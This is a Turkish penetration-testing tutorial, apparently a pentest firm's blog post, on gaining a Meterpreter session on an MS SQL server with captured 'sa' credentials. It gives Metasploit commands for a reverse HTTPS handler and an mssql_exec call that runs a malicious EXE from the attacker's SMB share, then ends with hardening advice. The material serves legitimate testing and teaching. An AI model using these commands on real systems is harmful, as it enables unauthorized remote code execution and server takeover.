MSF mssql_exec Auxiliary Modülü ve Elde Edilen MS SQL Veritabanı Kimlik Bilgileri ile MS SQL Veritabanı Sunucusuna Meterpreter Bağlantısı Elde Edilmesi

0
174
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola) kullanılarak MS SQL veritabanı uygulamasına erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parolası) elde edilmiş bir MS SQL veritabanı sunucusuna MSF mssql_exec auxiliary modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 172.22.71.5, MS SQL veritabanının kurulu olduğu Windows Server 2008 R2 sunucunun IP adresi ise 172.22.71.247 olduğu ve sysadmin rolündeki “sa” veritabanı hesabının parolasının “s93v43jd5” olarak tespit edildiğini varsayalım.

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım. Bu uygulama MSF mssql_exec modülüne parametre olarak verilecek ve çalışması sağlanacaktır.

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-exec-auxiliary-module-01

Kali sunucuda SAMBA sunucu uygulamasının yüklü olduğunu varsayalım. Kali bilgisayarda, “paylasim$” adlı gizli bir paylaşım dizinine herkes (everyone) için okuma ve yazma izni verilmiş olsun.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.22.71.5
set LPORT 443
set ExitOnSession false
exploit -j

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-exec-auxiliary-module-02

MSF mssql_exec auxiliary modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search mssql_exec
use auxiliary/admin/mssql/mssql_exec
show options

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-exec-auxiliary-module-03

MS SQL veritabanında yerel yönetici haklarına sahip olan ve kimlik bilgileri (“sa/s93v43jd5”) elde edilen kullanıcı hakları ile Kali bilgisayarın paylaşımındaki zararlı uygulamanın MSF mssql_exec auxiliary modülü ile çalıştırılması aşağıdaki gibi ayarlanabilir ve modül çalıştırılabilir:

set CMD start \\\\172.22.71.5\\paylasim$\\Zararli1.exe
set RHOST 172.22.71.247
set PASSWORD s93v43jd5
show options
run

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-exec-auxiliary-module-04

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions
sessions -i 1
getuid

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-msf-mssql-exec-auxiliary-module-05

Böylece Kali bilgisayarın diskinde bulunan zararlı yazılım, Windows makinenin diskine kaydedilmeden, Windows bilgisayarın belleğinde (RAM) çalışacaktır. Sonuçta da ters bir HTTPS bağlantı talebi olacak, Kali üzerindeki dinleyici tarafından yakalanmıştır. Ayrıca yukarıdaki ekran görüntüsünde de görüldüğü gibi MSSQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MS SQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında “sa” hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.